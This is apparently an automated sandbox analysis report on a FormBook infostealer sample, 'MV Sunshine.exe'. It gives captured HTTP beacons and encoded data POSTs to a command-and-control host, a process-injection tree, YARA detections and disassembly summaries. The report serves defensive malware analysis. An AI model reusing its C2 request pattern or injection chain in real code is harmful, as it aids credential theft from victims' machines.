Nov 4, 2024 04:19:43.203685045 CET	1778	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 41 58 64 4e 51 70 41 67 56 71 36 44 63 30 43 63 5a 37 4e 56 47 79 59 5a 64 48 39 6c 70 32 37 44 77 79 2b 48 50 33 59 69 72 46 6e 61 55 70 65 67 2b 52 6b 50 62 67 54 39 51 64 2f 46 34 50 6a 73 4a 4f 75 53 6c 63 71 30 36 66 66 30 61 53 38 70 4d 62 39 76 78 47 2b 65 5a 6f 4b 71 62 61 79 36 38 67 7a 31 75 5a 75 70 75 63 4d 31 50 65 57 46 6b 61 48 51 5a 76 38 65 6c 6c 69 62 6a 6a 6f 6d 48 75 46 66 68 36 61 34 47 41 4b 31 54 77 50 36 6f 70 4e 30 71 59 46 61 54 4a 72 76 39 76 4c 46 58 6c 2b 42 4e 71 5a 5a 33 75 4e 35 77 4e 37 43 4d 54 39 6d 75 33 7a 2f 67 4d 50 37 31 46 4b 49 4a 4a 68 30 61 64 59 32 6a 63 4d 6d 56 70 6d 64 58 57 4b 70 58 2f 69 62 64 6d 6e 52 38 52 56 39 6b 48 70 6a 53 67 41 75 73 48 36 2f 69 74 38 62 68 6a 6d 50 58 4a 37 4d 69 52 58 36 56 54 6a 54 57 66 35 54 67 46 65 4e 33 55 6d 52 66 41 37 64 36 34 34 6f 6e 34 6f 65 33 48 45 58 30 35 47 37 43 4b 51 38 52 6b 4e 2f 45 61 70 43 36 4a 4c 36 32 4c 4d 6d 49 6f 65 57 32 6d 4c 77 42 65 31 4d 58 4b 54 66 73 44 4d 4c 72 [TRUNCATED] Data Ascii: C4NDALSx=AXdNQpAgVq6Dc0CcZ7NVGyYZdH9lp27Dwy+HP3YirFnaUpeg+RkPbgT9Qd/F4PjsJOuSlcq06ff0aS8pMb9vxG+eZoKqbay68gz1uZupucM1PeWFkaHQZv8ellibjjomHuFfh6a4GAK1TwP6opN0qYFaTJrv9vLFXl+BNqZZ3uN5wN7CMT9mu3z/gMP71FKIJJh0adY2jcMmVpmdXWKpX/ibdmnR8RV9kHpjSgAusH6/it8bhjmPXJ7MiRX6VTjTWf5TgFeN3UmRfA7d644on4oe3HEX05G7CKQ8RkN/EapC6JL62LMmIoeW2mLwBe1MXKTfsDMLrg9QxuX8vfTzkJ0hY3BntV4WvJipAOj9sR0rdfCnLEcJVVinjxYsa1ve9yBE/t+9Dgs3cZ6g6ptV2WDNdJH8gAtSBn4niOSMXJtBNJzPajLMa55pNWt/HqOIf4fjug5I9u+cvHAFEWs1QJ6SbFCfS29qnO72GIIixH0fUrS2d+s6xBV6ihQpRxAO/8TYOuYnVWARCMeUZYSMSDmcbyictO/pZIzivSOLfqmbKz2RfBVBVRSHog0hO5j9WwfeqY6xNPeA03nBirqJCvlK8Eyq/2iDnlmUfl1FK/VxwA5nKiwhG1boeJoIfikf1FlllXcNCj+N68iQXyOrPOKcWE2QXN8i3UBhpADZiOzgusL9oVU7sBmTj1XEbKJZjz+hHLNn6KA4E74/laFHfvkSUEi30ItK3bMIuNBROKrtaM/OXJakdLV/oDoHI7UjUmz6DU0eXnQf0qCs8LcJtCG6SyvMmjb5D96H1WjsiqAskFKX5/6ESlRWJIehn6GyBiZIBR7HksWjLwSVaNrwTnGgxV/ILzMEG/REaZQApqH9Sl1o8n2/UVx4VtSdNLqcS06wz77uq8LGstMmW48L8jWN5O2BpCmUVLhNGybeGxEF+LObfPtzHgw1TiapU6jkIB+xgAA7MGklJTUhGsAXB/t2rXQHlFaqgfE0XEFS0kS [TRUNCATED]
Nov 4, 2024 04:19:44.073548079 CET	893	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuntpmlFUeSyJwkZzCzDJP472P1c0EphahmKfHQEcr3Ud1I4OOXwmsnUEwbykiLhOAUTZ6qqRjfsKSjIvcwHbI1YKO3MGl9HqhLIj0oZGgg3TnQv3TUR3uoxx2xtPH2Re5L%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd176d26ef0c871-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2151&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Nov 4, 2024 04:19:44.073875904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50027	104.21.59.91	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:45.750484943 CET	485	OUT	GET /9tmz/?CR=QnXHBNIHO&C4NDALSx=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVomu3TdCoEKHP3SCjiZu9i/U3COyypdj/Vq8BuTuGkCsmGPVqh+s= HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:19:46.623642921 CET	924	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrgZM4S6CRP5lfJXe2KU%2BQ1K%2BgqEuARreAsUGFoSx%2BEZkmQL5mA4HA4hrg2s%2FUNXZb4eaXuK4GbQ%2FUT613XgXGJXWcuDWG3AcBja9aV%2B%2Fvo0tt3BLaMVH5fMyGizO%2B3uKbvI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd176e25f8e4618-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=485&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0

Target ID:	0
Start time:	22:16:43
Start date:	03/11/2024
Path:	C:\Users\user\Desktop\MV Sunshine.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MV Sunshine.exe"
Imagebase:	0x620000
File size:	1'458'176 bytes
MD5 hash:	475B4EA012D5203638F77E129C548BBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:16:44
Start date:	03/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MV Sunshine.exe"
Imagebase:	0x910000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:16:55
Start date:	03/11/2024
Path:	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe"
Imagebase:	0x6f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	22:16:56
Start date:	03/11/2024
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\find.exe"
Imagebase:	0x2f0000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:17:10
Start date:	03/11/2024
Path:	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe"
Imagebase:	0x6f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:17:21
Start date:	03/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:18:11
Start date:	03/11/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	8.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00623B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00623B7A
IsDebuggerPresent.KERNEL32 ref: 00623B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,006E62F8,006E62E0,?,?), ref: 00623BFD

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Part of subcall function 00630A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623C26,006E62F8,?,?,?), ref: 00630ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00623C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006D93F0,00000010), ref: 0065D4BC
SetCurrentDirectoryW.KERNEL32(?,006E62F8,?,?,?), ref: 0065D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006D5D40,006E62F8,?,?,?), ref: 0065D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0065D581

Part of subcall function 00623A58: GetSysColorBrush.USER32(0000000F), ref: 00623A62
Part of subcall function 00623A58: LoadCursorW.USER32(00000000,00007F00), ref: 00623A71
Part of subcall function 00623A58: LoadIconW.USER32(00000063), ref: 00623A88
Part of subcall function 00623A58: LoadIconW.USER32(000000A4), ref: 00623A9A
Part of subcall function 00623A58: LoadIconW.USER32(000000A2), ref: 00623AAC
Part of subcall function 00623A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00623AD2
Part of subcall function 00623A58: RegisterClassExW.USER32(?), ref: 00623B28

Part of subcall function 006239E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00623A15
Part of subcall function 006239E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623A36
Part of subcall function 006239E7: ShowWindow.USER32(00000000,?,?), ref: 00623A4A
Part of subcall function 006239E7: ShowWindow.USER32(00000000,?,?), ref: 00623A53

Part of subcall function 006243DB: _memset.LIBCMT ref: 00624401
Part of subcall function 006243DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006244A6

Strings

runas, xrefs: 0065D575
%k, xrefs: 00623C56
This is a third-party compiled AutoIt script., xrefs: 0065D4B4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%k
API String ID: 529118366-1914796069
Opcode ID: 7c70892d54d092179d2d4272f5f9c39b955521628d56d597a478317f45dee060
Instruction ID: b68db007986ceca37184697c6e6ed0f113986d525b6cef67b9281caa7c270131
Opcode Fuzzy Hash: 7c70892d54d092179d2d4272f5f9c39b955521628d56d597a478317f45dee060
Instruction Fuzzy Hash: 9A511530E047A8AECF11ABB4EC45EED7B7BAB15340F004169F551AA2A1DB345706CF25

Function 00624FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00624EEE,?,?,00000000,00000000), ref: 00624FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00624EEE,?,?,00000000,00000000), ref: 00625010
LoadResource.KERNEL32(?,00000000,?,?,00624EEE,?,?,00000000,00000000,?,?,?,?,?,?,00624F8F), ref: 0065DD60
SizeofResource.KERNEL32(?,00000000,?,?,00624EEE,?,?,00000000,00000000,?,?,?,?,?,?,00624F8F), ref: 0065DD75
LockResource.KERNEL32(Nb,?,?,00624EEE,?,?,00000000,00000000,?,?,?,?,?,?,00624F8F,00000000), ref: 0065DD88

Strings

SCRIPT, xrefs: 00625006
Nb, xrefs: 0065DD85

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$Nb
API String ID: 3051347437-1100917352
Opcode ID: 550bb2abbf84832286b1ef024f3be3d6b3062e772c37ec8ccc7d3cb302f3fc4f
Instruction ID: dd3115b2b64bf8cdf0e5313344a0894b2e8f516a523734da64d3b58fd54baca7
Opcode Fuzzy Hash: 550bb2abbf84832286b1ef024f3be3d6b3062e772c37ec8ccc7d3cb302f3fc4f
Instruction Fuzzy Hash: B5115E75240B00AFD7319BA5EC58FA77BBAEBCAB11F104168F406C6660DB71EC008A61

Function 00624AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00624B2B

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

GetCurrentProcess.KERNEL32(?,006AFAEC,00000000,00000000,?), ref: 00624BF8
IsWow64Process.KERNEL32(00000000), ref: 00624BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00624C45
FreeLibrary.KERNEL32(00000000), ref: 00624C50
GetSystemInfo.KERNEL32(00000000), ref: 00624C81
GetSystemInfo.KERNEL32(00000000), ref: 00624C8D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 09d7f70fa35ec6513d2ae153e50661cf9532761e9130d27f12a75a79f777972c
Instruction ID: e5049e17281d8778882b1e6d22f6ed2b6c057879d1bbba80602b085e1213955c
Opcode Fuzzy Hash: 09d7f70fa35ec6513d2ae153e50661cf9532761e9130d27f12a75a79f777972c
Instruction Fuzzy Hash: 7191F43154ABD0DEC732DB6894511EABFE6AF2A301F444D9DE4CB93B41D620F908CB1A

Function 0062FE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%k, xrefs: 0062FE53
prn, xrefs: 00664DE3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharUpper
String ID: prn$%k
API String ID: 3964851224-2951428792
Opcode ID: 9d5f3225202b36a8d90fbcb92cea8c645cf679bd05184e9aaee3f5b74525b6f2
Instruction ID: 65da69cf8ab4b2a35b6aaace279180ccd640c6dfd4fa55cd6b32515383210721
Opcode Fuzzy Hash: 9d5f3225202b36a8d90fbcb92cea8c645cf679bd05184e9aaee3f5b74525b6f2
Instruction Fuzzy Hash: 2C926A74608751CFE760DF14C490B6AB7E2BF89304F14896DE98A8B352DB71EC49CB92

Function 0062E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dtn, xrefs: 0062EC1A
Dtn, xrefs: 0062EC21
Dtn, xrefs: 00663F1F
Dtn, xrefs: 00663F58
Variable must be of type 'Object'., xrefs: 0066428C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: Dtn$Dtn$Dtn$Dtn$Variable must be of type 'Object'.
API String ID: 0-3728122387
Opcode ID: cfda85344f435d0bfc4d2a8ab759fd41bfe0fa13131728126d6261c27ce60edb
Instruction ID: 79f7924cc3ed7fc6fd1ba28dfddb6d43f0cb0784a01b0f6db9b5a5acf622c091
Opcode Fuzzy Hash: cfda85344f435d0bfc4d2a8ab759fd41bfe0fa13131728126d6261c27ce60edb
Instruction Fuzzy Hash: 2CA28F74A04A25CFCB14CF98E580AA9B7B3FF58300F648169E916AB351D736ED42CF91

Function 00684696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0065E7C1), ref: 006846A6
FindFirstFileW.KERNELBASE(?,?), ref: 006846B7
FindClose.KERNEL32(00000000), ref: 006846C7

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a0cfda598c16333944a6fc1b9fb10070f9918db2a6fdaf88a124be736d6f11d4
Instruction ID: 814e33d68dd44e054eb52020e84d5bb4b8648a742abe7b09ce91ada108990838
Opcode Fuzzy Hash: a0cfda598c16333944a6fc1b9fb10070f9918db2a6fdaf88a124be736d6f11d4
Instruction Fuzzy Hash: 2CE0D8314104015B471077B8EC4D4EA779E9F07335F100715F835C11E0FBB06D908AD6

Function 00630B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00630BBB
timeGetTime.WINMM ref: 00630E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00630FB3
TranslateMessage.USER32(?), ref: 00630FC7
DispatchMessageW.USER32(?), ref: 00630FD5
Sleep.KERNEL32(0000000A), ref: 00630FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0063105A
DestroyWindow.USER32 ref: 00631066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00631080
Sleep.KERNEL32(0000000A,?,?), ref: 006652AD
TranslateMessage.USER32(?), ref: 0066608A
DispatchMessageW.USER32(?), ref: 00666098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006660AC

Strings

@GUI_CTRLHANDLE, xrefs: 0066540E
prn, xrefs: 006653D8
prn, xrefs: 0066542D
prn, xrefs: 00665383
@COM_EVENTOBJ, xrefs: 0066591A
@TRAY_ID, xrefs: 00665BB9
@GUI_CTRLID, xrefs: 00665364
@GUI_WINHANDLE, xrefs: 006653B9
prn, xrefs: 00665BDE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prn$prn$prn$prn
API String ID: 4003667617-1506231113
Opcode ID: 6327db719602aba26b14a08769ca3b67656bd3da486aaf00b9e5b0b3f5d100e3
Instruction ID: 004021c08a25bd527ace40fde2ad04792c66cf87f8a6ac4716573893a5913a43
Opcode Fuzzy Hash: 6327db719602aba26b14a08769ca3b67656bd3da486aaf00b9e5b0b3f5d100e3
Instruction Fuzzy Hash: F6B2AF70608741DFD724DF24C895BAAB7E7BF85304F14491DF48A8B2A1DB71E889CB86

Function 006893DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006891E9: __time64.LIBCMT ref: 006891F3

Part of subcall function 00625045: _fseek.LIBCMT ref: 0062505D

__wsplitpath.LIBCMT ref: 006894BE

